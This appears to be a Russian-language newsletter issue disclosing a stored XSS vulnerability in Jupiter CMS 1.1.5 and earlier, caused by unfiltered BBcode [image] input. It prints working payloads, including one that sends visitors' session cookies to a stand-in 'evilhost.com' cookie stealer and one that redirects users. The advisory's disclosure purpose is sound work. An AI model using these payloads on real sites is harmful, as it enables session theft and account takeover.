Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Jupiter CMS.


Компьютер для продвинутых пользователей
Содержание:
Jupiter CMS
ПО: Jupiter CMS
Версия: <=1.1.5
Сайт: http://www.highstrike.net/

О продукте:
Jupiter это динамическая система управлением содержания сайта типа mambo или limbo, разрешающая пользователям участвовать в работе сайта.
Уязвимость:
Поскольку отсутствует фильтр на вводе BBcode в [image], любой пользователь может вставить Javascript код и провести hijacking.
Использование:
1. Это позволяет показать окошко с текстом XSS всякий раз, когда загружается страничка:
[image=javascript:alert('XSS')]
2. Это позволяет захватить идентификатор сессии, который он может вставить в его куки и таким образом повысить себе привилегии:
[image=javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)]
3. Есть возможность переадресовать пользователя на любой сайт:
[image=javascript:window.navigate('http://www.evilhost.com/pwned.html')]

Комментарии:
Из-за сбоя поврежденного архива не удалось полностью разархивировать продукт. При этом Юпитер наотрез отказался работать на локальном сервере. Хочеться заметить, что производитель пока никак не отреагировал на эту уязвимость.

Jupiter CMS
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1[at]mail[dot]ru

В избранное